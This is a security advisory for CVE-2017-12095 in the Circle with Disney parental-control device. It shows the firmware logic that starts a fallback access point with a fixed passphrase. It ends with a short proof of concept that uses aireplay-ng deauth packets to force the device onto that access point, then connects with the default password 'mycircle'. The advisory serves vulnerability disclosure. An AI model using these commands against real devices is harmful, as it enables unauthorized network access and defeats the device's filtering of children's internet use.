CVE-2017-12095
An exploitable vulnerability exists in the WiFi Access Point feature of Circle with Disney running firmware 2.0.1. A series of WiFi packets can force Circle to setup an Access Point with default credentials. An attacker needs to send a series of spoofed “de-auth” packets to trigger this vulnerability.
Circle with Disney 2.0.1
6.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-284: Improper Access Control
Circle with Disney is a network device used to monitor internet use of children on a given network.
Circle can connect to a home network either via WiFi or wired connection. When no cable connection is possible, Circle will switch to WiFi, which was set-up during the initial configuration.
When connected via WiFi, the main function in the configd binary continuously checks for network connectivity by calling sub_40A55C.
This function verifies that the interface is associated with the Access Point and that it has an IP address assigned. If any of these checks aren’t satisfied, the return value will be 0, meaning there’s no available connection.
Back in the main function, when there’s no connection, function sub_40A2A0 will be called with argument “Internet connection down”. At high level, the function works as follows:
def circle_ap(status):
print "setting Wifi Status to %s" % status
if status == "paired":
system("circle_ap.sh down 30 &")
else
system("circle_ap.sh up &") # [1]
At [1] the circle_ap.sh script is called to start an Access Point.
Contents of the script are the following:
#!/bin/sh
CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
case $# in
2)
sleep $2
;;
esac
case "$1" in
up)
ps | grep [h]ostapd && ifconfig ra0 | grep UP && exit 0
killall hostapd;
ifconfig eth0 0.0.0.0
ifconfig ra0 10.123.234.1 netmask 255.255.255.0 up
hostapd -B /tmp/hostapd.conf # [2]
$CIRCLE_ROOT/scripts/refresh_hosts.sh ap
;;
down)
killall hostapd;
ifconfig ra0 10.123.234.1 netmask 255.255.255.0 down;
;;
*)
echo -n "usage: circle_ap <up/down> <optional delay>"
exit 1
esac
exit 0
At [2] hostapd is used to bring up an Access Point using the configuration below.
# grep -e ssid -e wpa /tmp/hostapd.conf
ssid=Circle-1234
wpa=3
wpa_passphrase=mycircle
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_group_rekey=600
The SSID used is “Circle-“ prefixed with the last two hex digits of the MAC address. The “wpa_passphrase” parameter is fixed.
Indeed, the base hostapd.conf file is copied from /mnt/shares/usr/bin/scripts/hostapd.conf during boot time by the script startcircle. The only modification applied is the SSID name.
This feature allows an attacker to connect to a Circle Access Point, after forcing it out of its legitimate WiFi network. The device will continue to function but won’t be able to apply any filtering over the original network, moreover this allows an attacker to conduct further attacks against the device that may be possible only on a common subnetwork.
As an example, this vulnerability would allow an external attacker to apply TALOS-2017-0396 and TALOS-2017-0371 to completely compromise the device.
The following proof of concept shows how to make the device disconnect from its legitimate WiFi network and to start its own Access Point, by sending a series of “deauth” packets.
$ airmon-ng start wlan0 1
$ aireplay-ng --deauth 10000 -a $WIFI_ROUTER_MAC -c $CIRCLE_MAC mon0
After a new Access Point is detected with name starting with “Circle-“ it’s possible to connect to it using the password “mycircle”.
2017-09-20 - Vendor Disclosure
2018-03-29 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.